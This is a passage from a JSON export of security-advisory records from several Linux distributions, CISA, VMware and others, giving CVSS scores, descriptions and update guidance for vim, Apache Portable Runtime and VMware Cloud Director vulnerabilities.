"2021-10-15T14:15:07", "type": "alpinelinux", "title": "CVE-2021-3875", "bulletinFamily": "unix", "cvss2": {"baseSeverity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3875"], "modified": "2023-11-07T03:38:20", "id": "ALPINE:CVE-2021-3875", "href": "https://security.alpinelinux.org/vuln/CVE-2021-3875", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-11-28T17:24:49", "description": "An out-of-bounds array read in the apr_time_exp*() functions was fixed in the Apache Portable Runtime 1.6.3 release (CVE-2017-12613). The fix for this issue was not carried forward to the APR 1.7.x branch, and hence version 1.7.0 regressed compared to 1.6.3 and is vulnerable to the same issue.", "cvss3": {"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-08-23T10:15:07", "type": "alpinelinux", "title": "CVE-2021-35940", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 3.2, "vectorString": "AV:L/AC:L/Au:S/C:P/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12613", "CVE-2021-35940"], "modified": "2023-11-07T03:36:39", "id": "ALPINE:CVE-2021-35940", "href": "https://security.alpinelinux.org/vuln/CVE-2021-35940", "cvss": {"score": 3.2, "vector": "AV:L/AC:L/Au:S/C:P/I:N/A:P"}}], "debiancve": [{"lastseen": "2023-11-28T02:27:51", "description": "vim is vulnerable to Heap-based Buffer Overflow", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "source": "security@huntr.dev", "type": "Secondary", "impactScore": 5.9}, "published": "2021-10-19T13:15:11", "type": "debiancve", "title": "CVE-2021-3872", "bulletinFamily": "info", "cvss2": {"baseSeverity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3872"], "modified": "2021-10-19T13:15:11", "id": "DEBIANCVE:CVE-2021-3872", "href": "https://security-tracker.debian.org/tracker/CVE-2021-3872", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T02:27:51", "description": "vim is vulnerable to Heap-based Buffer Overflow", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "source": "security@huntr.dev", "type": "Secondary", "impactScore": 5.9}, "published": "2021-10-15T14:15:07", "type": "debiancve", "title": "CVE-2021-3875", "bulletinFamily": "info", "cvss2": {"baseSeverity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3875"], "modified": "2021-10-15T14:15:07", "id": "DEBIANCVE:CVE-2021-3875", "href": "https://security-tracker.debian.org/tracker/CVE-2021-3875", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-11-28T02:19:53", "description": "An out-of-bounds array read in the apr_time_exp*() functions was fixed in the Apache Portable Runtime 1.6.3 release (CVE-2017-12613). The fix for this issue was not carried forward to the APR 1.7.x branch, and hence version 1.7.0 regressed compared to 1.6.3 and is vulnerable to the same issue.", "cvss3": {"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-08-23T10:15:07", "type": "debiancve", "title": "CVE-2021-35940", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 3.2, "vectorString": "AV:L/AC:L/Au:S/C:P/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12613", "CVE-2021-35940"], "modified": "2021-08-23T10:15:07", "id": "DEBIANCVE:CVE-2021-35940", "href": "https://security-tracker.debian.org/tracker/CVE-2021-35940", "cvss": {"score": 3.2, "vector": "AV:L/AC:L/Au:S/C:P/I:N/A:P"}}], "ics": [{"lastseen": "2023-11-28T16:48:11", "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 7.1**\n * **ATTENTION: **Low attack complexity\n * **Vendor:** Rockwell Automation\n * **Equipment:** FactoryTalk Edge Gateway\n * **Vulnerability:** Out-of-bounds Read\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of this vulnerability could allow a local user to cause the program to crash, causing a denial of service.\n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nRockwell Automation reports this vulnerability affects the following FactoryTalk Edge Gateway products:\n\n * FactoryTalk Edge Gateway: v1.3\n\n### 3.2 VULNERABILITY OVERVIEW\n\n**3.2.1 [OUT-OF-BOUNDS READ CWE-125](<https://cwe.mitre.org/data/definitions/125.html>)**\n\nAn out of bounds array read vulnerability was fixed in the apr_time_exp*() function in the Apache Portable Runtime v1.6.3 (CVE-2017-12613). The fix for this issue was not carried forward to the APR 1.7.x branch, and hence version 1.7.0 regressed compared to 1.6.3 and is vulnerable to the same issue.\n\n[CVE-2021-35940](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-35940>) has been assigned to this vulnerability. A CVSS v3 base score of 7.1 has been calculated; the CVSS vector string is ([AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H>)).\n\n### 3.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS:** Food and Agriculture, Transportation Systems, Water and Wastewater Systems\n * **COUNTRIES/AREAS DEPLOYED:** Worldwide\n * **COMPANY HEADQUARTERS LOCATION:** United States\n\n### 3.4 RESEARCHER\n\nRockwell Automation reported this vulnerability to CISA.\n\n## 4\\. MITIGATIONS\n\nRockwell Automation encourages users of the affected software to apply the risk mitigation below, if possible. Additionally, they encourage users to implement their suggested security best practices to minimize the risk.\n\n * [Update to v1.4](<https://compatibility.rockwellautomation.com/Pages/MultiProductCompareSelections.aspx?crumb=113&versions=61216,61185,60518,60151,59949,59464>)\n * [Security Best Practices](<https://rockwellautomation.custhelp.com/app/answers/answer_view/a_id/1085012/loc/en_US#__highlight>)\n\nPlease see the [Rockwell Automation publication](<https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1139743>) regarding this issue for more information.\n\nCISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure they are [not accessible from the Internet](<https://www.cisa.gov/uscert/ics/alerts/ICS-ALERT-10-301-01>).\n * Locate control system networks and remote devices behind firewalls and isolate them from business networks.\n * When remote access is required, use secure methods, such as virtual private networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as its connected devices.\n\nCISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nCISA also provides a section for [control systems security recommended practices](<https://us-cert.cisa.gov/ics/Recommended-Practices>) on the ICS webpage at [cisa.gov/ics](<https://cisa.gov/ics>). Several CISA products detailing cyber defense best practices are available for reading and download, including [Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies](<https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>).\n\nAdditional mitigation guidance and recommended practices are publicly available on the ICS webpage at [cisa.gov/ics](<https://cisa.gov/ics>) in the technical information paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<https://www.cisa.gov/uscert/ics/tips/ICS-TIP-12-146-01B>).\n\nOrganizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.\n\nNo known public exploits specifically target this vulnerability. This vulnerability is not exploitable remotely.\n", "cvss3": {"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2023-06-13T12:00:00", "type": "ics", "title": "Rockwell Automation FactoryTalk Edge Gateway", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 3.2, "vectorString": "AV:L/AC:L/Au:S/C:P/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12613", "CVE-2021-35940"], "modified": "2023-06-13T12:00:00", "id": "ICSA-23-164-03", "href": "https://www.cisa.gov/news-events/ics-advisories/icsa-23-164-03", "cvss": {"score": 3.2, "vector": "AV:L/AC:L/Au:S/C:P/I:N/A:P"}}], "osv": [{"lastseen": "2022-12-07T22:35:08", "description": "An out-of-bounds array read in the apr_time_exp*() functions was fixed in the Apache Portable Runtime 1.6.3 release (CVE-2017-12613). The fix for this issue was not carried forward to the APR 1.7.x branch, and hence version 1.7.0 regressed compared to 1.6.3 and is vulnerable to the same issue.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-08-23T10:15:00", "type": "osv", "title": "CVE-2021-35940", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 3.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12613", "CVE-2021-35940"], "modified": "2022-12-07T22:35:07", "id": "OSV:CVE-2021-35940", "href": "https://osv.dev/vulnerability/CVE-2021-35940", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:P"}}], "mageia": [{"lastseen": "2023-11-28T00:54:55", "description": "An out-of-bounds array read in the apr_time_exp*() functions was fixed in the Apache Portable Runtime 1.6.3 release (CVE-2017-12613). The fix for this issue was not carried forward to the APR 1.7.x branch, and hence version 1.7.0 regressed compared to 1.6.3 and is vulnerable to the same issue. (CVE-2021-35940) \n", "cvss3": {"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-09-23T04:49:29", "type": "mageia", "title": "Updated apr packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 3.2, "vectorString": "AV:L/AC:L/Au:S/C:P/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12613", "CVE-2021-35940"], "modified": "2021-09-23T04:49:29", "id": "MGASA-2021-0428", "href": "https://advisories.mageia.org/MGASA-2021-0428.html", "cvss": {"score": 3.2, "vector": "AV:L/AC:L/Au:S/C:P/I:N/A:P"}}, {"lastseen": "2023-11-28T00:54:55", "description": "Multiple Heap-based Buffer Overflows Stack-based Buffer overflows and a use after free. \n", "cvss3": {"exploitabilityScore": 2.1, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "source": "security@huntr.dev", "type": "Secondary", "impactScore": 5.9}, "published": "2021-12-03T18:45:31", "type": "mageia", "title": "Updated vim packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"baseSeverity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3872", "CVE-2021-3875", "CVE-2021-3903", "CVE-2021-3927", "CVE-2021-3928", "CVE-2021-3968", "CVE-2021-3973", "CVE-2021-3974"], "modified": "2021-12-03T18:45:31", "id": "MGASA-2021-0535", "href": "https://advisories.mageia.org/MGASA-2021-0535.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "vmware": [{"lastseen": "2023-11-27T18:19:41", "description": "3\\. Authentication Bypass Vulnerability (CVE-2023-34060) \n\nVMware Cloud Director Appliance contains an authentication bypass vulnerability in case VMware Cloud Director Appliance was upgraded to 10.5 from an older version. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2023-11-14T00:00:00", "type": "vmware", "title": "VMware Cloud Director Appliance contains an authentication bypass vulnerability (CVE-2023-34060).", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-34060"], "modified": "2023-11-14T00:00:00", "id": "VMSA-2023-0026", "href": "https://www.vmware.com/security/advisories/VMSA-2023-0026.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hivepro": [{"lastseen": "2023-11-22T16:44:26", "description": "Threat Level Vulnerability Report For a detailed threat advisory, download the pdf file here Summary VMware has disclosed a critical authentication bypass vulnerability affecting Cloud Director appliance deployments. This vulnerability, identified as CVE-2023-34060, the flaw could be exploited by a malicious actor to circumvent authentication protections in Cloud Director. To receive real-time threat advisories, please follow HiveForce Labs on LinkedIn.", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2023-11-17T08:07:39", "type": "hivepro", "title": "VMware Unveils Critical Authentication Bypass Vulnerability in VCD Appliance", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-34060"], "modified": "2023-11-17T08:07:39", "id": "HIVEPRO:8F75F0DA225CCE50A996BDCCDB9B77D2", "href": "https://www.hivepro.com/threat-advisory/vmware-unveils-critical-authentication-bypass-vulnerability-in-vcd-appliance/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "amazon": [{"lastseen": "2023-02-08T17:31:30", "description": "**Issue Overview:**\n\nA flaw was found in vim. A possible heap-based buffer overflow could allow an attacker to input a specially crafted file leading to a crash or code execution. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. (CVE-2021-3778)\n\nA use-after-free vulnerability in vim could allow an attacker to input a specially crafted file leading to memory corruption and a potentially exploitable crash or code execution. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. (CVE-2021-3796)\n\nAn out-of-bounds write flaw was found in vim's drawscreen.c win_redr_status() function. This flaw allows an attacker to trick a user to open a crafted file with specific arguments in vim, triggering an out-of-bounds write. The highest threat from this vulnerability is to confidentiality, integrity, and system availability. (CVE-2021-3872)\n\nThere's an out-of-bounds read flaw in Vim's ex_docmd.c. An attacker who is capable of tricking a user into opening a specially crafted file could trigger an out-of-bounds read on a memmove operation, potentially causing an impact to application availability. (CVE-2021-3875)\n\nA flaw was found in vim. A possible heap use-after-free vulnerability could allow an attacker to input a specially crafted file leading to a crash or code execution. The highest threat from this vulnerability is to system availability. (CVE-2021-3968)\n\nA flaw was found in vim. A possible heap-based buffer overflow could allow an attacker to input a specially crafted file leading to a crash or code execution. The highest threat from this vulnerability is to system availability. (CVE-2021-3973)\n\nA flaw was found in vim. A possible use-after-free vulnerability could allow an attacker to input a specially crafted file leading to a crash or code execution. The highest threat from this vulnerability is to system availability. (CVE-2021-3974)\n\n \n**Affected Packages:** \n\n\nvim\n\n \n**Issue Correction:** \nRun _yum update vim_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n aarch64: \n \u00a0\u00a0\u00a0 vim-common-8.2.3642-1.amzn2.0.1.aarch64 \n \u00a0\u00a0\u00a0 vim-minimal-8.2.3642-1.amzn2.0.1.aarch64 \n \u00a0\u00a0\u00a0 vim-enhanced-8.2.3642-1.amzn2.0.1.aarch64 \n \u00a0\u00a0\u00a0 vim-X11-8.2.3642-1.amzn2.0.1.aarch64 \n \u00a0\u00a0\u00a0 vim-debuginfo-8.2.3642-1.amzn2.0.1.aarch64 \n \n i686: \n \u00a0\u00a0\u00a0 vim-common-8.2.3642-1.amzn2.0.1.i686 \n \u00a0\u00a0\u00a0 vim-minimal-8.2.3642-1.amzn2.0.1.i686 \n \u00a0\u00a0\u00a0 vim-enhanced-8.2.3642-1.amzn2.0.1.i686 \n \u00a0\u00a0\u00a0 vim-X11-8.2.3642-1.amzn2.0.1.i686 \n \u00a0\u00a0\u00a0 vim-debuginfo-8.2.3642-1.amzn2.0.1.i686 \n \n noarch: \n \u00a0\u00a0\u00a0 vim-filesystem-8.2.3642-1.amzn2.0.1.noarch \n \n src: \n \u00a0\u00a0\u00a0 vim-8.2.3642-1.amzn2.0.1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 vim-common-8.2.3642-1.amzn2.0.1.x86_64 \n \u00a0\u00a0\u00a0 vim-minimal-8.2.3642-1.amzn2.0.1.x86_64 \n \u00a0\u00a0\u00a0 vim-enhanced-8.2.3642-1.amzn2.0.1.x86_64 \n \u00a0\u00a0\u00a0 vim-X11-8.2.3642-1.amzn2.0.1.x86_64 \n \u00a0\u00a0\u00a0 vim-debuginfo-8.2.3642-1.amzn2.0.1.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2021-3778](<https://access.redhat.com/security/cve/CVE-2021-3778>), [CVE-2021-3796](<https://access.redhat.com/security/cve/CVE-2021-3796>), [CVE-2021-3872](<https://access.redhat.com/security/cve/CVE-2021-3872>), [CVE-2021-3875](<https://access.redhat.com/security/cve/CVE-2021-3875>), [CVE-2021-3968](<https://access.redhat.com/security/cve/CVE-2021-3968>), [CVE-2021-3973](<https://access.redhat.com/security/cve/CVE-2021-3973>), [CVE-2021-3974](<https://access.redhat.com/security/cve/CVE-2021-3974>)\n\nMitre: [CVE-2021-3778](<https://vulners.com/cve/CVE-2021-3778>), [CVE-2021-3796](<https://vulners.com/cve/CVE-2021-3796>), [CVE-2021-3872](<https://vulners.com/cve/CVE-2021-3872>), [CVE-2021-3875](<https://vulners.com/cve/CVE-2021-3875>), [CVE-2021-3968](<https://vulners.com/cve/CVE-2021-3968>), [CVE-2021-3973](<https://vulners.com/cve/CVE-2021-3973>), [CVE-2021-3974](<https://vulners.com/cve/CVE-2021-3974>)\n", "cvss3": {"exploitabilityScore": 2.1, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-08T16:27:00", "type": "amazon", "title": "Medium: vim", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3778", "CVE-2021-3796", "CVE-2021-3872", "CVE-2021-3875", "CVE-2021-3968", "CVE-2021-3973", "CVE-2021-3974"], "modified": "2021-12-09T00:42:00", "id": "ALAS2-2021-1728", "href": "https://alas.aws.amazon.com/AL2/ALAS-2021-1728.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-27T21:49:58", "description": "**Issue Overview:**\n\nAn out-of-bounds array read in the apr_time_exp*() functions was fixed in the Apache Portable Runtime 1.6.3 release (CVE-2017-12613). The fix for this issue was not carried forward to the APR 1.7.x branch, and hence version 1.7.0 regressed compared to 1.6.3 and is vulnerable to the same issue. (CVE-2021-35940)\n\nInteger Overflow or Wraparound vulnerability in apr_base64 functions of Apache Portable Runtime Utility (APR-util) allows an attacker to write beyond bounds of a buffer. This issue affects Apache Portable Runtime Utility (APR-util) 1.6.1 and prior versions. (CVE-2022-24963)\n\n \n**Affected Packages:** \n\n\napr\n\n**Note:**\n\nThis advisory is applicable to Amazon Linux 2 (AL2) core repository. Visit this [FAQ section](<../../faqs.html#clarify-al2-advisories>) for the difference between AL2 core and AL2 extras advisories. \n\n \n**Issue Correction:** \nRun _yum update apr_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n aarch64: \n \u00a0\u00a0\u00a0 apr-1.7.2-1.amzn2.aarch64 \n \u00a0\u00a0\u00a0 apr-devel-1.7.2-1.amzn2.aarch64 \n \u00a0\u00a0\u00a0 apr-debuginfo-1.7.2-1.amzn2.aarch64 \n \n i686: \n \u00a0\u00a0\u00a0 apr-1.7.2-1.amzn2.i686 \n \u00a0\u00a0\u00a0 apr-devel-1.7.2-1.amzn2.i686 \n \u00a0\u00a0\u00a0 apr-debuginfo-1.7.2-1.amzn2.i686 \n \n src: \n \u00a0\u00a0\u00a0 apr-1.7.2-1.amzn2.src \n \n x86_64: \n \u00a0\u00a0\u00a0 apr-1.7.2-1.amzn2.x86_64 \n \u00a0\u00a0\u00a0 apr-devel-1.7.2-1.amzn2.x86_64 \n \u00a0\u00a0\u00a0 apr-debuginfo-1.7.2-1.amzn2.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2021-35940](<https://access.redhat.com/security/cve/CVE-2021-35940>), [CVE-2022-24963](<https://access.redhat.com/security/cve/CVE-2022-24963>)\n\nMitre: [CVE-2021-35940](<https://vulners.com/cve/CVE-2021-35940>), [CVE-2022-24963](<https://vulners.com/cve/CVE-2022-24963>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-13T15:40:00", "type": "amazon", "title": "Critical: apr", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, 